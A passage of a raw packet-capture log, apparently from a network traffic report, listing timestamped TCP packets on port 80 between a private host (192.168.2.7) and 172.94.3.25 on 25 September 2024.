                                      Sep 25, 2024 18:33:53.689590931 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.689632893 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.689670086 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.689702988 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.689708948 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.689708948 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.689735889 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.689769030 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.689800024 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.689815998 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.689836025 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.689847946 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.689868927 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.689902067 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.689934969 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.689968109 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.689973116 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.689973116 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.690001011 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.690035105 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.690068007 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.690100908 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.690123081 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.690123081 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.690134048 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.690321922 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.690439939 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.690473080 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.690505981 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.690560102 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.690594912 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.690628052 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.690639019 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.690639019 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.690660954 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.690695047 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.690732002 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.690771103 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.690771103 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.756879091 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.756922960 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.756939888 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.756982088 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.757044077 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.757060051 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.757076025 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.757122993 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.757123947 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.757179022 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.757191896 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.757385015 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.775702000 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.775718927 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.775737047 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.775810957 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.775989056 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.776006937 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.776045084 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.776055098 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.776071072 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.776115894 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.776217937 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.776232004 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.776248932 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.776263952 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.776274920 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.776279926 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.776302099 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.776328087 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.776518106 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.776668072 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.776683092 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.776699066 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.776705027 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.776715040 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.776730061 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.776743889 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.776758909 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.776770115 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.776777029 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.776803970 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.777170897 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.777184963 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.777199984 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.777221918 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.777226925 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.777237892 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.777254105 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.777256012 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.777270079 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.777272940 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.777288914 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.777307987 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.777636051 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.777664900 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.777677059 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.777679920 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.777694941 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.777709961 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.777725935 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.777725935 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.777759075 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.778163910 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.778178930 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.778192997 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.778208971 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.778219938 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.778224945 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.778239965 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.778243065 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.778255939 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.778271914 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.778273106 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.778289080 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.778302908 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.778304100 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.778320074 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.778335094 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.778337002 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.778348923 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.778359890 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.778388023 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.779074907 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.779089928 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.779104948 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.779119968 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.779134035 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.779134989 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.779150963 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.779160023 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.779165983 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.779184103 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.779190063 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.779197931 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.779212952 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.779227972 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.779234886 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.779242992 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.779258013 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.779261112 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.779273033 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.779279947 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.779331923 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.779978037 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.779994011 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.780009031 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.780024052 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.780040026 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.780050039 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.780055046 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.780070066 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.780080080 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.780086994 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.780093908 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.780102968 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.780117989 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.780121088 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.780133009 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.780148983 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.780164003 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.780165911 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.780179977 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.780184984 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.780224085 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.780947924 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.780982018 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.781016111 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.781024933 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.781053066 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.781085968 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.781107903 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.781117916 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.781151056 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.781178951 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.781183958 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.781215906 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.781224966 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.781250000 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.781281948 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.781294107 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.781317949 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.781351089 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.781371117 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.781790972 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.781842947 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.781873941 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.781877041 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.781910896 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.781924963 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.781949043 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.781981945 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.781991959 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.782013893 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.782047033 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.782059908 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.782078981 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.782110929 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.782119036 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.782143116 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.782176971 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.782191038 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.782210112 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.782243013 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.782254934 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.828800917 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.964260101 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.970079899 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.970132113 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.970171928 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.970216990 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.970226049 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.970257998 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.970290899 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.970298052 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.970335007 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.970359087 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.970590115 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.970622063 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.970628977 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.970654964 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.970691919 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.970696926 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.970725060 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.970757961 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.970762968 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.970792055 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.970825911 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.970834017 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.970880985 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.970948935 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.971257925 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.971291065 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.971323967 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.971338034 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.971360922 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.971407890 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.971436977 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.971471071 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.971503019 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.971535921 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.971546888 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.971580029 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.971580982 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.971615076 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.971659899 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.971924067 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.971956015 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.971987963 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.972026110 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.972032070 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.972059965 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.972091913 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.972100019 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.972131014 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.972141981 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.972173929 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.972207069 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.972215891 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.972239971 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.972271919 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.972280025 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.972305059 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.972337008 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.972378016 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.972733974 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.972769022 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.972815037 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.972822905 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.972871065 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.972879887 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.972904921 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.972940922 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.972954035 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.972973108 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.973006010 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.973011971 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.973038912 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.973073959 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.973079920 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.973107100 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.973143101 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.973177910 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.973195076 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.973217964 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.973629951 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.973663092 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.973706961 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.973716021 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.973751068 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.973784924 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.973807096 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.973818064 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.973851919 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.973889112 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.973891973 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.973927975 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.973952055 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.973963976 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.973999023 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.974014044 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.974030972 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.974065065 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.974102020 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.974450111 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.974495888 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.974503040 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.974536896 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.974577904 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.974586010 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.974618912 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.974652052 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.974688053 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.974701881 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.974723101 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.974733114 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.974755049 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.974787951 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.974796057 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.974822044 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.974853992 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.974870920 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.974886894 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.974939108 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.975564003 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.975598097 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.975630999 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.975641966 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.975667953 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.975699902 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.975733042 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.975753069 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.975764990 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.975776911 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.975799084 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.975832939 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.975864887 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.975878000 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.975898981 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.975910902 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.975933075 CEST8049699172.94.3.25192.168.2.7
